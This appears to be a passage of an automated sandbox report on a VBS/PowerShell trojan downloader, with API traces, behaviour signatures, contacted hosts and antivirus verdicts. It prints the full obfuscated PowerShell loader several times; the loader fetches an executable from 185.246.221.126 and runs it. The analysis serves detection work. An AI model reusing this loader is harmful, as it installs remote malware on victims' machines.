CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda5a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 96200464
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 96206416
registers.r11: 96202224
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1921415032
registers.r13: 0
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe -ExecutionPolicy UnRestricted function vLgQqc($shynNH, $cjqcQTcfPnhvHt){[IO.File]::WriteAllBytes($shynNH, $cjqcQTcfPnhvHt)};function DYJPznobxDJ($shynNH){if($shynNH.EndsWith((BUuvaHHCZtbEIxGO @(53247,53301,53309,53309))) -eq $True){Start-Process (BUuvaHHCZtbEIxGO @(53315,53318,53311,53301,53309,53309,53252,53251,53247,53302,53321,53302)) $shynNH}else{Start-Process $shynNH}};function ILHelJwYUYjnaSBmnS($OyikogZshAcTARtZfQp){$YXsYVbCYUcGsoQpjHgYWb = New-Object (BUuvaHHCZtbEIxGO @(53279,53302,53317,53247,53288,53302,53299,53268,53309,53306,53302,53311,53317));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cjqcQTcfPnhvHt = $YXsYVbCYUcGsoQpjHgYWb.DownloadData($OyikogZshAcTARtZfQp);return $cjqcQTcfPnhvHt};function BUuvaHHCZtbEIxGO($FsbvwAXRtBnk){$xOvWaMJmIEQbInC=53201;$KilsHtOT=$Null;foreach($eQdZafGaaTHrB in $FsbvwAXRtBnk){$KilsHtOT+=[char]($eQdZafGaaTHrB-$xOvWaMJmIEQbInC)};return $KilsHtOT};function uNhUPkTAcAmIxMjHI(){$fqjvQFxmiHBepHBwB = $env:AppData + '\';$JxRAct = $fqjvQFxmiHBepHBwB + '2023.exe.exe'; if (Test-Path -Path $JxRAct){DYJPznobxDJ $JxRAct;}Else{ $CWSPaD = ILHelJwYUYjnaSBmnS (BUuvaHHCZtbEIxGO @(53305,53317,53317,53313,53259,53248,53248,53250,53257,53254,53247,53251,53253,53255,53247,53251,53251,53250,53247,53250,53251,53255,53248,53299,53306,53311,53316,53248,53251,53249,53251,53252,53247,53302,53321,53302,53247,53302,53321,53302));vLgQqc $JxRAct $CWSPaD;DYJPznobxDJ $JxRAct;};;;;}uNhUPkTAcAmIxMjHI;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function vLgQqc($shynNH, $cjqcQTcfPnhvHt){[IO.File]::WriteAllBytes($shynNH, $cjqcQTcfPnhvHt)};function DYJPznobxDJ($shynNH){if($shynNH.EndsWith((BUuvaHHCZtbEIxGO @(53247,53301,53309,53309))) -eq $True){Start-Process (BUuvaHHCZtbEIxGO @(53315,53318,53311,53301,53309,53309,53252,53251,53247,53302,53321,53302)) $shynNH}else{Start-Process $shynNH}};function ILHelJwYUYjnaSBmnS($OyikogZshAcTARtZfQp){$YXsYVbCYUcGsoQpjHgYWb = New-Object (BUuvaHHCZtbEIxGO @(53279,53302,53317,53247,53288,53302,53299,53268,53309,53306,53302,53311,53317));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cjqcQTcfPnhvHt = $YXsYVbCYUcGsoQpjHgYWb.DownloadData($OyikogZshAcTARtZfQp);return $cjqcQTcfPnhvHt};function BUuvaHHCZtbEIxGO($FsbvwAXRtBnk){$xOvWaMJmIEQbInC=53201;$KilsHtOT=$Null;foreach($eQdZafGaaTHrB in $FsbvwAXRtBnk){$KilsHtOT+=[char]($eQdZafGaaTHrB-$xOvWaMJmIEQbInC)};return $KilsHtOT};function uNhUPkTAcAmIxMjHI(){$fqjvQFxmiHBepHBwB = $env:AppData + '\';$JxRAct = $fqjvQFxmiHBepHBwB + '2023.exe.exe'; if (Test-Path -Path $JxRAct){DYJPznobxDJ $JxRAct;}Else{ $CWSPaD = ILHelJwYUYjnaSBmnS (BUuvaHHCZtbEIxGO @(53305,53317,53317,53313,53259,53248,53248,53250,53257,53254,53247,53251,53253,53255,53247,53251,53251,53250,53247,53250,53251,53255,53248,53299,53306,53311,53316,53248,53251,53249,53251,53252,53247,53302,53321,53302,53247,53302,53321,53302));vLgQqc $JxRAct $CWSPaD;DYJPznobxDJ $JxRAct;};;;;}uNhUPkTAcAmIxMjHI;
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function vLgQqc($shynNH, $cjqcQTcfPnhvHt){[IO.File]::WriteAllBytes($shynNH, $cjqcQTcfPnhvHt)};function DYJPznobxDJ($shynNH){if($shynNH.EndsWith((BUuvaHHCZtbEIxGO @(53247,53301,53309,53309))) -eq $True){Start-Process (BUuvaHHCZtbEIxGO @(53315,53318,53311,53301,53309,53309,53252,53251,53247,53302,53321,53302)) $shynNH}else{Start-Process $shynNH}};function ILHelJwYUYjnaSBmnS($OyikogZshAcTARtZfQp){$YXsYVbCYUcGsoQpjHgYWb = New-Object (BUuvaHHCZtbEIxGO @(53279,53302,53317,53247,53288,53302,53299,53268,53309,53306,53302,53311,53317));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cjqcQTcfPnhvHt = $YXsYVbCYUcGsoQpjHgYWb.DownloadData($OyikogZshAcTARtZfQp);return $cjqcQTcfPnhvHt};function BUuvaHHCZtbEIxGO($FsbvwAXRtBnk){$xOvWaMJmIEQbInC=53201;$KilsHtOT=$Null;foreach($eQdZafGaaTHrB in $FsbvwAXRtBnk){$KilsHtOT+=[char]($eQdZafGaaTHrB-$xOvWaMJmIEQbInC)};return $KilsHtOT};function uNhUPkTAcAmIxMjHI(){$fqjvQFxmiHBepHBwB = $env:AppData + '\';$JxRAct = $fqjvQFxmiHBepHBwB + '2023.exe.exe'; if (Test-Path -Path $JxRAct){DYJPznobxDJ $JxRAct;}Else{ $CWSPaD = ILHelJwYUYjnaSBmnS (BUuvaHHCZtbEIxGO @(53305,53317,53317,53313,53259,53248,53248,53250,53257,53254,53247,53251,53253,53255,53247,53251,53251,53250,53247,53250,53251,53255,53248,53299,53306,53311,53316,53248,53251,53249,53251,53252,53247,53302,53321,53302,53247,53302,53321,53302));vLgQqc $JxRAct $CWSPaD;DYJPznobxDJ $JxRAct;};;;;}uNhUPkTAcAmIxMjHI;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2172 CREDAT:145409
host 117.18.232.200
host 185.246.221.126
parent_process iexplore.exe martian_process powershell.exe -ExecutionPolicy UnRestricted function vLgQqc($shynNH, $cjqcQTcfPnhvHt){[IO.File]::WriteAllBytes($shynNH, $cjqcQTcfPnhvHt)};function DYJPznobxDJ($shynNH){if($shynNH.EndsWith((BUuvaHHCZtbEIxGO @(53247,53301,53309,53309))) -eq $True){Start-Process (BUuvaHHCZtbEIxGO @(53315,53318,53311,53301,53309,53309,53252,53251,53247,53302,53321,53302)) $shynNH}else{Start-Process $shynNH}};function ILHelJwYUYjnaSBmnS($OyikogZshAcTARtZfQp){$YXsYVbCYUcGsoQpjHgYWb = New-Object (BUuvaHHCZtbEIxGO @(53279,53302,53317,53247,53288,53302,53299,53268,53309,53306,53302,53311,53317));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cjqcQTcfPnhvHt = $YXsYVbCYUcGsoQpjHgYWb.DownloadData($OyikogZshAcTARtZfQp);return $cjqcQTcfPnhvHt};function BUuvaHHCZtbEIxGO($FsbvwAXRtBnk){$xOvWaMJmIEQbInC=53201;$KilsHtOT=$Null;foreach($eQdZafGaaTHrB in $FsbvwAXRtBnk){$KilsHtOT+=[char]($eQdZafGaaTHrB-$xOvWaMJmIEQbInC)};return $KilsHtOT};function uNhUPkTAcAmIxMjHI(){$fqjvQFxmiHBepHBwB = $env:AppData + '\';$JxRAct = $fqjvQFxmiHBepHBwB + '2023.exe.exe'; if (Test-Path -Path $JxRAct){DYJPznobxDJ $JxRAct;}Else{ $CWSPaD = ILHelJwYUYjnaSBmnS (BUuvaHHCZtbEIxGO @(53305,53317,53317,53313,53259,53248,53248,53250,53257,53254,53247,53251,53253,53255,53247,53251,53251,53250,53247,53250,53251,53255,53248,53299,53306,53311,53316,53248,53251,53249,53251,53252,53247,53302,53321,53302,53247,53302,53321,53302));vLgQqc $JxRAct $CWSPaD;DYJPznobxDJ $JxRAct;};;;;}uNhUPkTAcAmIxMjHI;
parent_process iexplore.exe martian_process powershell.exe -ExecutionPolicy UnRestricted function vLgQqc($shynNH, $cjqcQTcfPnhvHt){[IO.File]::WriteAllBytes($shynNH, $cjqcQTcfPnhvHt)};function DYJPznobxDJ($shynNH){if($shynNH.EndsWith((BUuvaHHCZtbEIxGO @(53247,53301,53309,53309))) -eq $True){Start-Process (BUuvaHHCZtbEIxGO @(53315,53318,53311,53301,53309,53309,53252,53251,53247,53302,53321,53302)) $shynNH}else{Start-Process $shynNH}};function ILHelJwYUYjnaSBmnS($OyikogZshAcTARtZfQp){$YXsYVbCYUcGsoQpjHgYWb = New-Object (BUuvaHHCZtbEIxGO @(53279,53302,53317,53247,53288,53302,53299,53268,53309,53306,53302,53311,53317));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cjqcQTcfPnhvHt = $YXsYVbCYUcGsoQpjHgYWb.DownloadData($OyikogZshAcTARtZfQp);return $cjqcQTcfPnhvHt};function BUuvaHHCZtbEIxGO($FsbvwAXRtBnk){$xOvWaMJmIEQbInC=53201;$KilsHtOT=$Null;foreach($eQdZafGaaTHrB in $FsbvwAXRtBnk){$KilsHtOT+=[char]($eQdZafGaaTHrB-$xOvWaMJmIEQbInC)};return $KilsHtOT};function uNhUPkTAcAmIxMjHI(){$fqjvQFxmiHBepHBwB = $env:AppData + '\';$JxRAct = $fqjvQFxmiHBepHBwB + '2023.exe.exe'; if (Test-Path -Path $JxRAct){DYJPznobxDJ $JxRAct;}Else{ $CWSPaD = ILHelJwYUYjnaSBmnS (BUuvaHHCZtbEIxGO @(53305,53317,53317,53313,53259,53248,53248,53250,53257,53254,53247,53251,53253,53255,53247,53251,53251,53250,53247,53250,53251,53255,53248,53299,53306,53311,53316,53248,53251,53249,53251,53252,53247,53302,53321,53302,53247,53302,53321,53302));vLgQqc $JxRAct $CWSPaD;DYJPznobxDJ $JxRAct;};;;;}uNhUPkTAcAmIxMjHI;
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function vLgQqc($shynNH, $cjqcQTcfPnhvHt){[IO.File]::WriteAllBytes($shynNH, $cjqcQTcfPnhvHt)};function DYJPznobxDJ($shynNH){if($shynNH.EndsWith((BUuvaHHCZtbEIxGO @(53247,53301,53309,53309))) -eq $True){Start-Process (BUuvaHHCZtbEIxGO @(53315,53318,53311,53301,53309,53309,53252,53251,53247,53302,53321,53302)) $shynNH}else{Start-Process $shynNH}};function ILHelJwYUYjnaSBmnS($OyikogZshAcTARtZfQp){$YXsYVbCYUcGsoQpjHgYWb = New-Object (BUuvaHHCZtbEIxGO @(53279,53302,53317,53247,53288,53302,53299,53268,53309,53306,53302,53311,53317));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cjqcQTcfPnhvHt = $YXsYVbCYUcGsoQpjHgYWb.DownloadData($OyikogZshAcTARtZfQp);return $cjqcQTcfPnhvHt};function BUuvaHHCZtbEIxGO($FsbvwAXRtBnk){$xOvWaMJmIEQbInC=53201;$KilsHtOT=$Null;foreach($eQdZafGaaTHrB in $FsbvwAXRtBnk){$KilsHtOT+=[char]($eQdZafGaaTHrB-$xOvWaMJmIEQbInC)};return $KilsHtOT};function uNhUPkTAcAmIxMjHI(){$fqjvQFxmiHBepHBwB = $env:AppData + '\';$JxRAct = $fqjvQFxmiHBepHBwB + '2023.exe.exe'; if (Test-Path -Path $JxRAct){DYJPznobxDJ $JxRAct;}Else{ $CWSPaD = ILHelJwYUYjnaSBmnS (BUuvaHHCZtbEIxGO @(53305,53317,53317,53313,53259,53248,53248,53250,53257,53254,53247,53251,53253,53255,53247,53251,53251,53250,53247,53250,53251,53255,53248,53299,53306,53311,53316,53248,53251,53249,53251,53252,53247,53302,53321,53302,53247,53302,53321,53302));vLgQqc $JxRAct $CWSPaD;DYJPznobxDJ $JxRAct;};;;;}uNhUPkTAcAmIxMjHI;
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\2023.exe.exe
Process injection Process 2172 resumed a thread in remote process 1184
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000368
suspend_count: 1
process_identifier: 1184
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
dead_host 185.246.221.126:80
Lionic Trojan.Script.Generic.4!c
Sangfor Malware.Generic-VBS.Save.d3bc8d82
Arcabit Trojan.Generic.D3F149E6
VirIT Trojan.HTA.Agent.MR
Cyren VBS/Agent.APP!Eldorado
Symantec Trojan.Gen.NPE
ESET-NOD32 VBS/TrojanDownloader.Agent.XAO
TrendMicro-HouseCall TROJ_FRS.0NA103DR23
Avast Other:Malware-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Trojan.GenericKD.66144742
NANO-Antivirus Trojan.Script.Downloader.jpdglv
MicroWorld-eScan Trojan.GenericKD.66144742
Tencent Vbs.Trojan-Downloader.Der.Jflw
Emsisoft Trojan.GenericKD.66144742 (B)
F-Secure Malware.VBS/Dldr.Agent.VPJK
DrWeb JS.DownLoader.6102
VIPRE Trojan.GenericKD.66144742
TrendMicro TROJ_FRS.0NA103DR23
FireEye Trojan.GenericKD.66144742
Jiangmin Trojan.Script.amhb
Avira VBS/Dldr.Agent.VPJK
MAX malware (ai score=88)
Antiy-AVL Trojan[Downloader]/VBS.Agent
Xcitium Malware@#1dh2ookrtv3d8
GData Trojan.GenericKD.66144742
Google Detected
ALYac Trojan.GenericKD.66144742
Ikarus Trojan-Downloader.VBS.Agent
Fortinet VBS/Agent.UQJ!tr
AVG Other:Malware-gen [Trj]